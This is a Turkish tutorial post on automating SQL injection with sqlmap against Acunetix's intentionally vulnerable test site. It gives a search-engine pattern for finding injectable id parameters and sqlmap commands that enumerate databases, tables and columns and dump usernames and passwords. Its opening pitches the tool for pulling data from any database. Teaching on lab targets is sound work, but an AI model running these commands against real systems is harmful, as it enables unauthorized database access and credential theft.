Herhangi bir veritabanından veya sunucudan zahmetsizce veri almak için SQL enjeksiyonuna yönelik bir otomasyon aracının gücünden yararlanın.
SQL Injection saldırılarında size yardımcı olabilecek harika bir aracı tanıtmaktan heyecan duyuyorum. Çoğu insan SQL enjeksiyon saldırılarını manuel olarak gerçekleştirmek istemez çünkü çok zaman alır ve sonuç garantisi yoktur. SQLmap, SQL enjeksiyon saldırıları için en iyi komut satırı aracıdır.
Not: Birçok öğretici mevcut olduğu için sqlmap'in tamamını ele almayacağım. Bunun yerine, SQL enjeksiyonu kullanarak bir SQL enjeksiyon saldırısını nasıl gerçekleştireceğinizi öğretmeye odaklanacağım.
Kurulum:
Kali Linux kullanıyorsanız hazır gelir.sudo apt install sqlmap
Nasıl Kullanılır
SQLmap bir komut satırı aracıdır. sqlmap'in tüm işlevlerini man sqlmap kullanarak görebiliriz. İlk olarak, SQL saldırısı gerçekleştirmek için hedefi alalım.
- Burada hedef olarak Acunetix Target=http://testphp.vulnweb.com/ tarafından hazırlanan vulnweb.com sitesini kullanıyorum.
site:http://testphp.vulnweb.com/ php?id=
Hedef bağlantıyı bulmak için site ve php kimliğini kullanabiliriz burada bazı sonuçlar görebiliriz URL'de bir id parametresine sahip olabiliriz.
Saldırı bağlantısını bulduktan sonra artık saldırıyı gerçekleştirmeye başlayabiliriz. Öncelikle veritabanını, ardından verilere erişmek için tablo ve sütunları bulmamız gerekir.
Veritabanı Nasıl Bulunur
bu komutu kullanabiliriz:
- --dbs DBMS veritabanlarını numaralandırır
- -u Hedef URL
Burada 2 veritabanı buluyoruz 1. acuart ve 2. information_schema bu bizim sql' imizdeki varsayılan veritabanıdır, bu yüzden acuart veritabanını kontrol etmemiz gerekir.
Tablolar Nasıl Bulunur
bu komutu kullanabiliriz:
sqlmap -u http://testphp.vulnweb.com/AJAX/infoartist.php?id=1 -D acuart --tables
- -D veritabanı
- --tables tabloları görmek için
Burada acuart veritabanında bulunan tüm tabloları bulabiliriz. Sütunlarını görüntülemek için bir tablo seçmeliyiz.
Sütunlar Nasıl Bulunur
bu komutu kullanabiliriz:
sqlmap -u http://testphp.vulnweb.com/AJAX/infoartist.php?id=1 -D acuart -T users --columns
- -D veritabanı
- -T tabloları
- --columns sütunları görmek için
Burada verilerimizi içeren tüm sütunları görebiliriz. Bakalım uname ne içeriyor.
Sütunlardan Veri Nasıl Alınır
bu komutu kullanabiliriz:
sqlmap -u http://testphp.vulnweb.com/AJAX/infoartist.php?id=1 -D acuart -T users -C uname --dump
- -c sütunları
- --dump verileri çıkar
Burada kullanıcı adı testimiz var ve tablolarda sahip olduğumuz pass sütununu kullanarak şifreyi de bulabiliriz. Ayrıca şifreyi de bulalım.
sqlmap -u http://testphp.vulnweb.com/AJAX/infoartist.php?id=1 -D acuart -T users -C pass --dump
burada da test olan bir şifre alıyoruz. Şimdi web sitemize giriş yapmak için tüm detaylara sahibiz:
- username=test
- password=test